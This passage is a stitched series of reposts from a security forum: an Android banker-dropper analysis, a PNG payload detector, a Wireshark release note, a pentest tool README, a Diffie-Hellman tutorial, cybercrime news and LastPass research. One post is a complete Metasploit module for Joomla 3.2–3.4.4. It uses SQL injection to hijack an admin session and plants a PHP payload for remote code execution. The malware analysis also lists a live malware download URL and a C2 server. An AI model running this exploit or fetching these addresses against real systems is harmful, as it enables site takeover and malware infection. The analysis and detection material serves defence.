After launch, the Trojan will immediately drop and request the user to install Adobe Flash Player. But first let’s take a look at the dropping technique. In the app assets there is nothing else to drop other than an image file.

[Figure 3: Trojan dropper assets]

There is only one image of dice stored in assets, but its size is more than 3.6 MB and that’s a bit suspicious. After inspecting the code, the application wasn’t dropping this PNG file. The Trojan dropper at first opens this image file and searches for a delimiter string, in this case "12345678901234567890". Right after this delimiter another application encoded by Base64 is stored.

[Figure 4: Dropping embedded malware]

[Figure 5: Binary view of PNG file]

The decoded data are then stored on external storage as “prefix.apk” and the user is asked to install it. The decoded application, prefix.apk, is a heavily obfuscated Android banker, stealing user credentials. After installation it requests the user to activate Administrator rights for the application. This is the simplest method that prevents uninstalling this Trojan.

[Figure 6: Banker install and device administrator request]

If the user tries to deactivate Administrator rights then they are repeatedly asked to activate it again. There are two ways to get rid of this nasty banker. Either by going to safe mode on your device, deactivating Administrator rights and uninstalling it, or by using Android Debug Bridge (adb) and uninstalling it from your computer. Both apps, the Trojan dropper and the dropped banker, are most probably obfuscated and protected by DexProtector. It’s very complicated to analyze it statically without any dynamic intervention.

[Figure 7: Code obfuscation]

The banker can steal user login credentials or credit card information with a phishing technique. When the user opens his mobile banking application or just the Google Play Store, a malicious activity will be displayed on top of the official application. This way the user can be easily fooled into entering sensitive information in the banker's pop-up window.

[Figure 8: Banker's phishing windows]

User credentials are immediately sent to a remote server.

[Figure 9: Send stolen credentials for Gmail app]

[Figure 10: Send stolen credentials for CommBank app]

[Figure 11: Send stolen credentials for PayPal app]

This banker is very popular. Lately I tweeted about the same banker but stored on a different server.

[h=3]More information[/h]

HASH dropper: 1F41BA0781D51751971EE705DFA307D2
HASH PNG: 575551FBC343EC8E1A1C771D81963096
HASH dropped: 90886B56372F5191A78A20DCB3F9FE6E
Download link: http://jackdojacksgot.ru/img/Update.apk
Remote server: 75jng75ufnf.ru:2080

Posted by Lukas Stefanko at 11:47 PM

Sursa: http://b0n1.blogspot.ro/2015/11/android-malware-drops-banker-from-png.html
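The dropping technique described above (image, delimiter string, Base64 payload after it) is easy to detect generically: a PNG ends at its IEND chunk, so any bytes after it are a red flag regardless of which delimiter a given sample uses, and once the delimiter is known the payload can be recovered for further analysis. This is an added example and not the author's code; the 1x1 PNG and the stand-in payload are constructed in-line, and only the delimiter value is taken from the post.

```python
"""Detect and extract a payload appended to a PNG after the IEND chunk, the
dropping technique the post describes (delimiter string, then Base64 data).
Added example, not the author's code; the PNG and the payload below are
constructed in-line, only the delimiter value is the one quoted in the post."""
import base64
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
DELIMITER = b"12345678901234567890"   # delimiter string quoted in the post


def png_end_offset(data):
    """Walk the chunk list and return the offset just past IEND's CRC.
    Raises ValueError for anything that is not a well-formed PNG."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)
        pos += 8 + length + 4          # 4-byte length, 4-byte type, data, CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("no IEND chunk")


def trailing_bytes(data):
    """Number of bytes after the image proper; a legitimate PNG has zero."""
    return len(data) - png_end_offset(data)


def extract_appended_payload(data, delimiter=DELIMITER):
    """Return the Base64-decoded blob stored after delimiter, or None."""
    end = png_end_offset(data)
    idx = data.find(delimiter, end)
    if idx < 0:
        return None
    blob = data[idx + len(delimiter):].strip()
    return base64.b64decode(blob, validate=True)


def _chunk(ctype, payload):
    """Serialise one PNG chunk with its CRC-32 over type and data."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_sample(payload):
    """Constructed 1x1 grayscale PNG, returned clean and with payload appended
    the way the dropper stores it (delimiter, then Base64)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit, grayscale
    idat = zlib.compress(b"\x00\x00")                     # filter byte + one pixel
    png = PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    return png, png + DELIMITER + base64.b64encode(payload)


# Constructed stand-in for the dropped APK (a real one starts with the same
# 'PK' zip magic, which is a useful sanity check on what you extracted).
FAKE_APK = b"PK\x03\x04 constructed stand-in for prefix.apk"

if __name__ == "__main__":
    clean, stuffed = build_sample(FAKE_APK)
    print("clean image trailing bytes:", trailing_bytes(clean))
    print("dropper image trailing bytes:", trailing_bytes(stuffed))
    print("recovered payload:", extract_appended_payload(stuffed))
```

`trailing_bytes` is the check worth running over every image in an APK's assets during triage: a 3.6 MB picture of dice with megabytes after IEND is exactly the anomaly the post noticed by eye.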
  10. Network protocol analyzer Wireshark 2.0 released
Posted on 24 November 2015.

Wireshark, the most popular network protocol analyzer, has reached version 2.0. It features a completely new user interface which should provide a smoother, faster user experience. Here's an in-depth video introduction to Wireshark 2.0.

The libwireshark API has undergone some major changes:
- The emem framework (including all ep_ and se_ memory allocation routines) has been completely removed in favour of wmem, which is now fully mature.
- The (long-since-broken) Python bindings support has been removed. If you want to write dissectors in something other than C, use Lua.
- Plugins can now create GUI menu items.
- Heuristic dissectors can now be globally enabled/disabled, so heur_dissector_add() has a few more parameters to make that possible.
- proto_tree_add_text has been removed.
- tvb_length() has been removed in favor of tvb_reported_length() and tvb_captured_length().
- The API for ONC RPC-based dissectors has changed significantly: the procedure dissectors no longer take an offset, void-argument procedures now need to be declared with a function (use dissect_rpc_void()), and rpc_init_prog() now handles procedure registration too (it takes additional arguments to handle this; rpc_init_proc_table() was removed).

The following features are new (or have been significantly updated) since version 2.0.0rc3:
- An RTP player crash has been fixed.
- Flow graph issues have been fixed.
- A Follow Stream dialog crash has been fixed.
- An extcap crash has been fixed.
- A file merge crash has been fixed.
- A handle leak crash has been fixed.
- Several other crashes and usability issues have been fixed.

Sursa: http://www.net-security.org/secworld.php?id=19147
  11. Nytro

    autopwn

    autopwn
    Specify targets and run sets of tools against them

    autopwn is designed to make a pentester's life easier and more consistent by allowing them to specify tools they would like to run against targets, without having to type them in a shell or write a script. This tool will probably be useful during certain exams as well.

    Installation
    It is recommended that you use the docker image while exposing TCP 5000 for autopwn clients to connect to. This is because the autopwn docker image is already setup (tools are installed and in the right place).

    Only allow this package to listen on a loopback IP address. If you have this package listen on a public IP, you're allowing arbitrary users to execute commands as root on your server. Eventually, HTTPS and credentials will be required, but for now, don't be a moron.

    From Docker
    1. Execute docker pull rascal999/autopwn
    2. Run docker run -i -t -p 127.0.0.1:5000:5000 rascal999/autopwn /usr/sbin/autopwn
    3. Run autopwn client (you can get the Java application at https://github.com/rascal999/autopwn-gui)

    From the Python Package Index (for development)
    Execute pip install autopwn

    From this repository
    1. Clone the Git repository
    2. Change into the newly created directory
    3. Execute pip install .

    Usage
    Running autopwn will start the web server. Sample output:

    * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
    * Restarting with stat
    127.0.0.1 - - [15/Nov/2015 11:04:41] "GET /ping HTTP/1.1" 200 -
    127.0.0.1 - - [15/Nov/2015 11:04:41] "GET /favicon.ico HTTP/1.1" 404 -

    In order to interface with autopwn you should use autopwn-gui (available at https://github.com/rascal999/autopwn-gui). You can also use autopwn-cli (available at https://github.com/rascal999/autopwn-cli). If you're interested in the API, you can also do stuff in the browser.

    Contributing
    1. Fork it!
    2. Create your feature branch: git checkout -b my-new-feature
    3. Commit your changes: git commit -am 'Add some feature'
    4. Push to the branch: git push origin my-new-feature
    5. Submit a pull request

    Credits
    Developed by Aidan Marlin (aidan [dot] marlin [at] nccgroup [dot] com) while working at NCC Group. I'd like to thank the following contributors for their work on previous autopwn versions: Selfegris, 0xsauby, berdario

    Sursa: https://github.com/nccgroup/autopwn
  12. [h=1]Joomla Content History SQLi Remote Code Execution[/h]
[code]
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Joomla Content History SQLi Remote Code Execution",
      'Description'    => %q{
        This module exploits a SQL injection vulnerability found in Joomla versions
        3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
        component in the core of Joomla. Triggering the SQL injection makes it possible
        to retrieve active Super User sessions. The cookie can be used to login to the
        Joomla administrator backend. By creating a new template file containing our
        payload, remote code execution is made possible.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Asaf Orpani',                   # Vulnerability discovery
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2015-7857' ], # Admin session hijacking
          [ 'CVE', '2015-7297' ], # SQLi
          [ 'CVE', '2015-7857' ], # SQLi
          [ 'CVE', '2015-7858' ], # SQLi
          [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ],
          [ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ]
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as POST data, so
          # really it's unlimited
          'Space'       => 262144, # 256k
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Joomla 3.x <= 3.4.4', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 23 2015",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
      ], self.class)
  end

  def check
    # Request using a non-existing table
    res = sqli(rand_text_alphanumeric(rand(10)+6))

    if res && res.body =~ /`(.*)_ucm_history`/
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def sqli( tableprefix )
    # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
    # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
    # This way we make sure that's excluded and we only get real admin sessions.
    sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"

    # Retrieve cookies
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "index.php"),
      'vars_get' => {
        'option'         => 'com_contenthistory',
        'view'           => 'history',
        'list[ordering]' => '',
        'item_id'        => '1',
        'type_id'        => '1',
        'list[select]'   => sql
      }
    })

    return res
  end

  def exploit
    # Request using a non-existing table first, to retrieve the table prefix
    res = sqli(rand_text_alphanumeric(rand(10)+6))

    if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/
      table_prefix = $1
      print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
    end

    # Retrieve the admin session using our retrieved table prefix
    res = sqli("#{table_prefix}_")

    if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/
      auth_cookie_part = $1[0...-1]
      print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
    else
      fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
    end

    # Retrieve cookies
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "administrator", "index.php")
    })

    if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
      cookie_begin = $1
      print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
    end

    # Modify cookie to authenticated admin
    auth_cookie = cookie_begin
    auth_cookie << "="
    auth_cookie << auth_cookie_part
    auth_cookie << ";"

    # Authenticated session
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie' => auth_cookie
    })

    if res && res.code == 200 && res.body =~ /Administration - Control Panel/
      print_status("#{peer} - Successfully authenticated as Administrator")
    else
      fail_with(Failure::Unknown, "#{peer} - Session failure")
    end

    # Retrieve template view
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'   => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'view'   => 'templates'
      }
    })

    # We try to retrieve and store the first template found
    if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/
      template_id = $1
      file_id = $2
    else
      fail_with(Failure::Unknown, "Unable to retrieve template")
    end

    filename = rand_text_alphanumeric(rand(10)+6)

    # Create file
    print_status("#{peer} - Creating file [ #{filename}.php ]")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'    => auth_cookie,
      'vars_get'  => {
        'option' => 'com_templates',
        'task'   => 'template.createFile',
        'id'     => template_id,
        'file'   => file_id,
      },
      'vars_post' => {
        'type' => 'php',
        'name' => filename
      }
    })

    # Grab token
    if res && res.code == 303 && res.headers['Location']
      location = res.headers['Location']
      print_status("#{peer} - Following redirect to [ #{location} ]")
      res = send_request_cgi(
        'uri'    => location,
        'method' => 'GET',
        'cookie' => auth_cookie
      )

      # Retrieving template token
      if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/
        token = $1
        print_status("#{peer} - Token [ #{token} ] retrieved")
      else
        fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
      end

      if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
        template_path = $1
        print_status("#{peer} - Template path [ #{template_path} ] retrieved")
      else
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Creating file failed")
    end

    filename_base64 = Rex::Text.encode_base64("/#{filename}.php")

    # Inject payload data into file
    print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'    => auth_cookie,
      'vars_get'  => {
        'option' => 'com_templates',
        'view'   => 'template',
        'id'     => template_id,
        'file'   => filename_base64,
      },
      'vars_post' => {
        'jform[source]'       => payload.encoded,
        'task'                => 'template.apply',
        token                 => '1',
        'jform[extension_id]' => template_id,
        'jform[filename]'     => "/#{filename}.php"
      }
    })

    if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
      print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
    end

    # Request payload
    register_files_for_cleanup("#{filename}.php")
    print_status("#{peer} - Executing payload")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
      'cookie' => auth_cookie
    })
  end
end
[/code]
Sursa: https://www.exploit-db.com/exploits/38797/
  13. A programmer wrote scripts to secretly automate a lot of his job — and email his wife and make a latte Julie Bort There's a hilarious project that's popular on GitHub, the website that hosts all kinds of software that programmers want to share with each other. The project was shared by a programmer named Nihad Abbasov, known as "Narkoz" on GitHub. It consists of a bunch of software scripts with some funny but NSFW names. Narkoz says that the scripts came from one of his coworkers who left for another company, the type of guy that "if something — anything — requires more than 90 seconds of his time, he writes a script to automate that." After the guy left for a new job, his former coworkers were looking through his work and discovered that the guy had automated all sorts of crazy things, including parts of his job, his relationships, and making coffee. The guy wrote one script that sends a text message "late at work" to his wife and "automatically picks reasons" from a preset list of them, says Narkoz. It sent this text anytime there was activity with his login on the company's computer servers after 9 p.m. He wrote another script relating to a customer he didn't like, given the not-nice name he chose for this script. It scans his inbox for an email from the customer that uses words like "help," "trouble," and "sorry" and automatically rolls the guy's database to the latest backup, then sends a reply: "No worries mate, be careful next time." With another script, he automatically fired off an email excuse like "not feeling well, working from home" if he wasn't at work and logged in to the servers by 8:45 a.m. He called that script "hangover." And the best one? He wrote a script that waits 17 seconds, then hacks into the coffee machine and orders it to start brewing a latte. The script tells the machine to wait another 24 seconds before pouring the latte into a cup, the exact time it takes to walk from the guy's desk to the coffee machine. 
And his coworkers didn't even know the coffee machine was on the network and hackable. Sursa: http://www.businessinsider.com/programmer-automates-his-job-2015-11
  14. As a side project I have been doing some self-study on encryption to better understand it. It is how we protect our data as it travels across the internet or when at rest, we use concepts from it to verify that we sent messages, and whole currency schemes are built around the idea. Encryption is an incredibly dense topic and it is easy to mess up. As such, all of the code I have written should not be used for any real encryption. The goal here is to make some of the concepts easier to understand. For those interested in learning more about the history, I quite enjoyed The Code Book. As for a more in-depth understanding of cryptography, take a look at Cryptography Engineering. Then you and I can struggle through it together!

Diffie-Hellman Key Exchange

The first topic for encryption we will go over is the Diffie-Hellman Key Exchange (DHKE). I think there is no better way to explain the basics than how Wikipedia does, specifically in the image below. Alice and Bob want to share a key to encrypt their communications. Using paint (instead of math) we think of it like so:

1. Alice and Bob decide on a common paint color
2. Alice and Bob pick their own secret paint color
3. Alice and Bob combine their secret color with the common color
4. Alice and Bob trade this mixed paint
5. Alice mixes Bob’s paint with her secret color
6. Bob mixes Alice’s paint with his secret color
7. Now Alice and Bob have a shared secret color

(Alice and Bob will be recurring characters so you will have to get used to them!)

[Image: DHKE described using paint (courtesy Wikipedia)]

The Key

This section is more of a big picture section, so if you already have a basic understanding of encryption feel free to move on (or not, maybe you enjoy reading what I write). A key, in cryptography, is used to lock and unlock a message. But imagine trying to share a key and send a message to someone via a courier. If the message is clear text, the courier can read it. So we encrypt it. How do we then share a key with that person to decrypt it? If we just send the key, then the courier has that also and can decrypt it. DHKE aims to solve that problem. Let’s take a look at a working example.

A Working Example

I wrote some code to handle this which you can find here. Below is the output you can see from running it (with some flags to make it more verbose).

[Image: DHKE between Alice and Bob]

A note on my iconography:
x -> y : means x sends a message to y
Internal means that it is occurring locally for that person

First Alice tells Bob to set his prime base to 5 (and Eve, who is attempting to eavesdrop, sees this). Then Alice tells Bob to set his prime mod to 23 (which Eve also sees). Then both Alice and Bob create a random secret and perform a calculation using that secret and the prime base and prime mod. Then Alice tells Bob the result of her calculation and vice versa (and Eve sees both of these). Finally they perform one more set of calculations and arrive at a shared secret.

DHKE In Math

So how does this actually work? Modular arithmetic to the rescue! The equation that we are looking at is g^x mod p. g and p combine (sort of) to make our common paint. There are some restrictions around what numbers we are allowed to choose for g and x, one of which I discuss later, but we do know that p is prime. x is where this gets interesting. Alice and Bob will each select their own secret number for this (their secret paint as it were), a and b respectively. This can be any number. Then each calculates g^x mod p, and shares it (their mixed paint). Now Alice has g^b mod p (B from now on) from Bob and Bob has g^a mod p (A from now on) from Alice (Eve would have these as well). Then each takes their secret key and combines it mod p with the number they received. So Alice has B^a mod p and Bob has A^b mod p, which is their secret key. Wait, B^a mod p and A^b mod p are the secret keys? That must mean they are the same value! How cool is that?

Let’s go back through the steps to understand it better.

1. Alice and Bob decide on two numbers g and p.
2. Alice and Bob select a secret number, a and b respectively
3. Alice and Bob calculate g ^ x mod p where x is their number
4. Alice and Bob share these numbers (A and B)
5. Alice and Bob combine the shared number with their secret to generate the shared secret

So let’s look at what we have at step 5:

Alice has: B^a mod p = (g^b mod p) ^ a mod p = g^ab mod p
Bob has: A^b mod p = (g^a mod p) ^ b mod p = g^ab mod p

You might be saying, I still don’t get why that works. This is where a deeper understanding of modular arithmetic comes in handy. I will walk you through some of the basics (or not, if you have already had enough math, but I would say soldier on, you only need elementary math knowledge for the most part). When we calculate something like y mod z what we are really calculating is the remainder of y / z (or y % z in a lot of programming languages). When y < z then y % z is y. When it is larger it works like a clock. As y grows y % z will go through all values 0 to z – 1 until it is a multiple of z and then it will go back to 0 and then it will proceed through all of those values again.

It turns out that the exponentiation operation in modular arithmetic is transitive. So (a ^ b) ^ c mod d = (a ^ c) ^ b mod d = a ^ (bc) mod d. So Alice is calculating (g^b mod p) ^ a mod p which is (g^b) ^ a mod p. From that, both sides end up having g^ab mod p.

This is where one of the restrictions on g and p comes in. For a ^ b mod c, the possible results can be limited depending on the numbers selected. Let’s look at an example: a ^ b mod 7.

2 ^ 1 mod 7 = 2 mod 7 = 2
2 ^ 2 mod 7 = 4 mod 7 = 4
2 ^ 3 mod 7 = 8 mod 7 = 1
2 ^ 4 mod 7 = 16 mod 7 = 2
2 ^ 5 mod 7 = 32 mod 7 = 4
2 ^ 6 mod 7 = 64 mod 7 = 1
…

See where that is an issue? It only results in 3 numbers, which means that only half of all numbers less than 7 can be a key (and limiting the key space is a bad thing!). So instead we pick a number like 3:

3 ^ 1 mod 7 = 3 mod 7 = 3
3 ^ 2 mod 7 = 9 mod 7 = 2
3 ^ 3 mod 7 = 27 mod 7 = 6
3 ^ 4 mod 7 = 81 mod 7 = 4
3 ^ 5 mod 7 = 243 mod 7 = 5
3 ^ 6 mod 7 = 729 mod 7 = 1
…

Here we can see that 3^x mod 7 can be any number less than 7, so our key space is larger. If you want to learn more about that it’s called a primitive root modulo n.

The Benefits

Alice and Bob have managed to generate the same number, but how does that solve this problem? Let’s look at this from Eve’s perspective.

[Image: What Eve sees from Alice and Bob’s DHKE]

Without any of the flags, the output shows only what Eve can see. In this example, Eve sees g and p as well as A and B. To determine what the secret key is, Eve needs to determine what a (or b) is, which means solving this equation for a: A = g^a mod p. As it turns out, this is a very tough equation to solve. These tough problems are often called trap door functions, functions that are easy to calculate in one direction, but not in the other (some doors you can’t come back from). This problem is specifically called the discrete logarithm problem, if you’re interested in looking further.

That means that Alice and Bob have shared a number, over an insecure medium, without revealing what that number is. Using that number, they can now send messages that are encrypted that they both can decrypt. Yay! Now you know a little bit more about DHKE and how we protect our secrets. To promote further security, we actually will regenerate a key for each session. So if one of your keys traded in this manner is ever actually calculated, it only affects that session. This is what we call forward secrecy!

I have two more concepts on deck to talk about soon (you may have noticed the git repository), the RSA algorithm for asymmetric encryption and HMACs. Once I have them completed the last sentence will contain links! Go forth and hack encrypt!

References:
https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange
https://en.wikipedia.org/wiki/Discrete_logarithm_problem
https://en.wikipedia.org/wiki/Primitive_root_modulo_n

Malarkey
Sursa: https://warroom.securestate.com/index.php/encryption-basics-dhke/
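The exchange and the primitive-root check from the post above, as an added example that is not the post's own repository code: it uses the walkthrough's g = 5 and p = 23, reproduces the 2-versus-3 mod 7 key-space comparison, and adds Eve's brute-force discrete log to show why the toy prime is breakable and a real one is not. Function names are my own.

```python
import secrets

# Added educational example, not the post's own code. Function names are my
# own; g=5, p=23 are the values the post's walkthrough uses. Toy sizes only.


def powers_mod(g: int, p: int) -> list:
    """g^1, g^2, ..., g^(p-1) mod p: every value g^x mod p can ever take."""
    return [pow(g, k, p) for k in range(1, p)]


def is_primitive_root(g: int, p: int) -> bool:
    """True when g^x mod p reaches every value 1..p-1, i.e. the key space is full."""
    return len(set(powers_mod(g, p))) == p - 1


def dh_public(g: int, p: int, secret: int) -> int:
    """The 'mixed paint' one side sends over the wire: g^secret mod p."""
    return pow(g, secret, p)


def dh_shared(peer_public: int, secret: int, p: int) -> int:
    """Combine what we received with our own secret: peer_public^secret mod p."""
    return pow(peer_public, secret, p)


def dhke(g: int, p: int, a: int = None, b: int = None) -> dict:
    """Run the whole exchange; a and b default to random secrets in 1..p-2."""
    if not is_primitive_root(g, p):
        raise ValueError("g=%d is not a primitive root mod %d; key space would shrink" % (g, p))
    a = secrets.randbelow(p - 2) + 1 if a is None else a
    b = secrets.randbelow(p - 2) + 1 if b is None else b
    A = dh_public(g, p, a)          # Alice -> Bob   (Eve sees A)
    B = dh_public(g, p, b)          # Bob -> Alice   (Eve sees B)
    s_alice = dh_shared(B, a, p)    # Internal, Alice: B^a mod p
    s_bob = dh_shared(A, b, p)      # Internal, Bob:   A^b mod p
    assert s_alice == s_bob         # both are g^(ab) mod p
    return {"A": A, "B": B, "shared": s_alice}


def discrete_log_bruteforce(g: int, p: int, A: int) -> int:
    """Eve's generic option: try every exponent until g^x mod p == A.

    Instant for p=23; for the 2048-bit primes used in practice the loop
    would never finish, which is the trap door the post describes.
    """
    for x in range(1, p):
        if pow(g, x, p) == A:
            return x
    return None


if __name__ == "__main__":
    print("2 mod 7 ->", powers_mod(2, 7), "primitive root:", is_primitive_root(2, 7))
    print("3 mod 7 ->", powers_mod(3, 7), "primitive root:", is_primitive_root(3, 7))
    run = dhke(5, 23, a=6, b=15)
    print("A=%d B=%d shared=%d" % (run["A"], run["B"], run["shared"]))
    print("Eve recovers a =", discrete_log_bruteforce(5, 23, run["A"]))
```

With a = 6 and b = 15 the public values are A = 8 and B = 19 and both sides arrive at 2; a fresh run without fixed secrets gives a new shared value each time, which is the per-session regeneration the post ends on.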
  15. Alleged Malware Service Operators Arrested in UK By Eduard Kovacs on November 23, 2015 A partnership between the security firm Trend Micro and the United Kingdom’s National Crime Agency (NCA) resulted in the arrests of two individuals suspected of running a website that offered cybercrime services. The suspects, a man and a woman aged 22 from Colchester, Essex, are believed to have operated a counter antivirus service called reFUD.me and a crypting service named Cryptex Reborn. They have been released on bail until February 2016. Both the Cryptex Reborn and reFUD.me services have been disrupted as a result of the operation. ReFUD.me, which emerged in February 2015, allowed cybercriminals to upload their malware samples to see if they would be detected by the products of various antivirus companies. ReFUD.me was similar to VirusTotal, but unlike the Google-owned scanning service, it did not share scanned files with antivirus vendors. Before it was shut down, the reFUD.me website claimed that more than 1.2 million scans had been conducted since February 2015. One of the most recent features added to the cybercrime service, dubbed “scanwatch,” allowed users to constantly monitor the detection status of the files they uploaded. Cryptex Reborn, the evolution of a toolkit advertised since as early as October 2011, allowed malware developers to encrypt their files in an effort to make them “Fully UnDetectable” (FUD). Malware authors could use the product after paying a $20 monthly subscription fee or $90 for lifetime usage. The first versions of the tool, called Cryptex, Cryptex Lite and Cryptex Advanced, all surfaced in 2011. Cryptex Reborn, which is said to offer one of the most sophisticated forms of crypting seen in recent years, was first advertised on cybercrime forums in September 2014, said Trend Micro. 
“This investigation is the result of Trend Micro’s collaboration with the National Crime Agency of the UK (NCA) and other partners to tackle some of the core components that enable cybercriminal business models to exist,” said Martin Rösler, senior director of The Forward-Looking Threat Research team for Trend Micro. “Helping to take down operations such as this is part of our ongoing effort to keep the world safe for exchanging digital information, for both our customers and the Internet at large.” The collaboration between Trend Micro and the NCA is the result of a memorandum of understanding signed by the two organizations in July. Sursa: http://www.securityweek.com/alleged-malware-service-operators-arrested-uk
  16. He's sick, he has caffeinology. We urgently need to make some espresso donations!
  17. https://veracrypt.codeplex.com/ https://ciphershed.org/ https://truecrypt.ch/
  18. Nytro

    Fun stuff

    Classic:
  19. Small toolkit for easy creation and usage of various python scripts that work with embedded devices.
- core - contains most of the toolkit's basic functions
- databases - contains databases, like default credentials etc.
- interface - contains the code used for creating and manipulating the interface
- modules - contains the structure of modules that can be loaded; every module contains vendor-specific sub-modules where scripts are stored:
  - decryptors
  - exploits
  - harvesters
  - misc
  - scanners
- output - output goes here
This is still heavy work in progress
Link: https://github.com/j91321/rext
  20. Flaws found in LastPass password manager by security researchers
David Bisson, November 17, 2015 9:30 pm

Two security researchers have discovered a number of bugs, bad practices, and design issues in the popular LastPass password manager. Martin Vigo and Alberto Garcia Illera, both security engineers at Salesforce.com, recently presented their analysis of LastPass at Black Hat Europe 2015. In a blog post describing their findings, Vigo and Garcia say that after conducting some preliminary research, the duo decided to see if they could attack LastPass's password vault directly and obtain access to LastPass credentials via three different techniques: client-side attacks, LastPass-side attacks, and attacks from the outside.

Regarding the first method of attack, the researchers found a way to exploit session cookies, allowing them to gain access to the encrypted vault key. "We can use the session cookie to query LastPass and obtain the pwdeckey value," the duo explained. "Once we have that, we can derive a key by doing SHA256(pwdeckey). Now we just need to extract the encrypted vault key from the SQLite DB and decrypt it using the key we just derived."

After unearthing some weaknesses in the way LastPass configured its two-factor authentication protocols, Vigo and Garcia eventually found a way to recover a disabled One Time Password (known as a dOTP, and which the researchers describe as a "master password on steroids") that is stored locally on a user's machine. "This is key to understand the advantage of this attack versus stealing the master password which needs the victim to have previously clicked 'Remember Password'," the researchers note. The duo finally used the dOTP to obtain the session cookie and the encrypted vault key, which they decrypted using the dOTP.

Moving on to LastPass-side attacks, Vigo and Garcia found that the vault itself was not encrypted per se but instead presented cleartext metadata with encrypted values. 
(The URLs/icons were only encoded, whereas credentials were encrypted using a weak method.) They also found that LastPass added a "custom_js" parameter to every Account node: "Javascript code that will be injected and run in every page load in the domain’s context. While this is a legitimate feature, it gives LastPass the possibility of stealing all your credentials." For outside attacks, the researchers do not go into too much detail in the blog post, and instead direct readers to view the slides of their talk. At first glance, these bugs with LastPass might seem to endorse the actions of those who - against the advice of some - immediately decided to migrate away from LastPass after the company was bought by LogMeIn. But, as Vigo and Garcia note, LastPass may not be the only password manager with vulnerabilities, and its development team have at least responded to the findings in what seems to be a responsible and timely manner: We found a number of bugs, bad practices and design issues and used them to obtain the vault key and decrypt all passwords in different scenarios. There is no bug-free software and any future research on other password managers would likely have similar results. LastPass has responded and fixed most of the issues in less than 72 hours. "We want to point out that the security team at LastPass responded very quickly to all our reports and lot of the issues were fixed in just a couple days," the pair explain. "It was very easy to communicate and work with them." Password managers can have their weaknesses, but as pointed out by Bob Covello on Tripwire's The State of Security blog, even faulty password managers are a good choice versus users storing their passwords in local files. LastPass has taken responsibility for its bugs; it stands to reason that many of these issues will 